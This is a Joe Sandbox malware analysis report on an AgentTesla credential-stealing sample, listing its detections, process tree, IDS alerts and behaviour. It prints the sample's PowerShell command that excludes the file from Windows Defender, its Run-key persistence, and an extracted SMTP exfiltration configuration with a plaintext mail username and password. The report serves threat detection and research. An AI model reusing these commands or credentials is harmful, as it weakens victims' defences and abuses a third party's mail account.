Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Eschemyquote24573j33.exe

Overview

General Information

Sample name:Eschemyquote24573j33.exe
Analysis ID:1519249
MD5:bdd152d62cf8fa852e08c46505629663
SHA1:b1a0fd6a26c5bf9ba02c12afcdc89eeb8528040e
SHA256:a2cdc2f4fcad4c6b982674a1b3b86a0f7bcdb7c8f18c1183799d70777c726859
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Eschemyquote24573j33.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\Eschemyquote24573j33.exe" MD5: BDD152D62CF8FA852E08C46505629663)
    • powershell.exe (PID: 6616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6488 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Eschemyquote24573j33.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\Eschemyquote24573j33.exe" MD5: BDD152D62CF8FA852E08C46505629663)
  • ctsdvwT.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
    • ctsdvwT.exe (PID: 320 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
  • ctsdvwT.exe (PID: 2892 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
    • ctsdvwT.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.ctsdvwT.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.ctsdvwT.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                8.2.ctsdvwT.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x336c8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3373a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x337c4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33856:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x338c0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33932:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x339c8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33a58:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                10.2.ctsdvwT.exe.3f0d1a8.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.ctsdvwT.exe.3f0d1a8.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 22 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ParentImage: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ParentProcessId: 4332, ParentProcessName: Eschemyquote24573j33.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ProcessId: 6616, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ProcessId: 7140, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ParentImage: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ParentProcessId: 4332, ParentProcessName: Eschemyquote24573j33.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ProcessId: 6616, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.167.140.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Eschemyquote24573j33.exe, Initiated: true, ProcessId: 7140, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49716
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ParentImage: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ParentProcessId: 4332, ParentProcessName: Eschemyquote24573j33.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ProcessId: 6616, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T09:06:54.339278+020020301711A Network Trojan was detected192.168.2.549716108.167.140.123587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T09:08:24.118030+020028555421A Network Trojan was detected192.168.2.549716108.167.140.123587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T09:06:54.339278+020028397231Malware Command and Control Activity Detected192.168.2.549716108.167.140.123587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T09:06:54.339278+020028400321A Network Trojan was detected192.168.2.549716108.167.140.123587TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeReversingLabs: Detection: 57%
                    Multi AV Scanner detection for submitted file
                    Source: Eschemyquote24573j33.exeReversingLabs: Detection: 57%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Eschemyquote24573j33.exeJoe Sandbox ML: detected
                    Source: Eschemyquote24573j33.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Eschemyquote24573j33.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: BXgJ.pdb source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr
                    Source: Binary string: BXgJ.pdbSHA256+ source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4x nop then jmp 06F8A50Bh0_2_06F89A6C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 0708A1DBh7_2_0708973C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 07A5A1E3h10_2_07A59744

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49716 -> 108.167.140.123:587
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49716 -> 108.167.140.123:587
                    Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49716 -> 108.167.140.123:587
                    Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49716 -> 108.167.140.123:587
                    Source: global trafficTCP traffic: 192.168.2.5:49716 -> 108.167.140.123:587
                    Source: Joe Sandbox ViewIP Address: 108.167.140.123 108.167.140.123
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: global trafficTCP traffic: 192.168.2.5:49716 -> 108.167.140.123:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: mail.musabody.com
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.musabody.com
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2068800637.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000007.00000002.2195768710.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2276352451.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, POq2Ux.cs.Net Code: _4H57oeN1J
                    Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, POq2Ux.cs.Net Code: _4H57oeN1J
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_0693EE20 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0693FC90,00000000,000000004_2_0693EE20
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Eschemyquote24573j33.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_0275DEEC0_2_0275DEEC
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F81DB80_2_06F81DB8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F86CB00_2_06F86CB0
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F81DA80_2_06F81DA8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F84D300_2_06F84D30
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F8C2A80_2_06F8C2A8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F848F80_2_06F848F8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F848F80_2_06F848F8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F848E00_2_06F848E0
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F871C00_2_06F871C0
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F851680_2_06F85168
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_032B97584_2_032B9758
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_032B4AA84_2_032B4AA8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_032BC9D84_2_032BC9D8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_032B8F904_2_032B8F90
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_032B3E904_2_032B3E90
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_032B41D84_2_032B41D8
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_06936C744_2_06936C74
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_06932D984_2_06932D98
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_069308484_2_06930848
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_069326B04_2_069326B0
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_06938C964_2_06938C96
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_06936C684_2_06936C68
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_06937FA64_2_06937FA6
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 4_2_06937FA84_2_06937FA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_012CDEEC7_2_012CDEEC
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_07081DB87_2_07081DB8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_0708BF807_2_0708BF80
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_07084D307_2_07084D30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_07081D797_2_07081D79
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_07086CB07_2_07086CB0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_070851687_2_07085168
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_070871C07_2_070871C0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_070848E07_2_070848E0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_070848F87_2_070848F8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_018796388_2_01879638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_0187C9808_2_0187C980
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_01874AA88_2_01874AA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_01873E908_2_01873E90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_018741D88_2_018741D8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_068604488_2_06860448
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_068611F08_2_068611F0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06866C6C8_2_06866C6C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06862D988_2_06862D98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_068622B08_2_068622B0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06867F818_2_06867F81
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06867FA88_2_06867FA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06868C978_2_06868C97
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_0187CC688_2_0187CC68
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_013DDEEC10_2_013DDEEC
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A51DB810_2_07A51DB8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A5BF8010_2_07A5BF80
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A51DA810_2_07A51DA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A54D3010_2_07A54D30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A51D7910_2_07A51D79
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A56CB010_2_07A56CB0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A571C010_2_07A571C0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A5516810_2_07A55168
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A548F810_2_07A548F8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0181963811_2_01819638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0181C98011_2_0181C980
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_01814AA811_2_01814AA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_01813E9011_2_01813E90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_018141D811_2_018141D8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0181CC6811_2_0181CC68
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003B6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2068800637.00000000029B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exe, 00000000.00000000.2032928595.0000000000536000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBXgJ.exe> vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2066084246.000000000093E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2072001901.0000000007280000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4505813523.00000000011D9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exeBinary or memory string: OriginalFilenameBXgJ.exe> vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
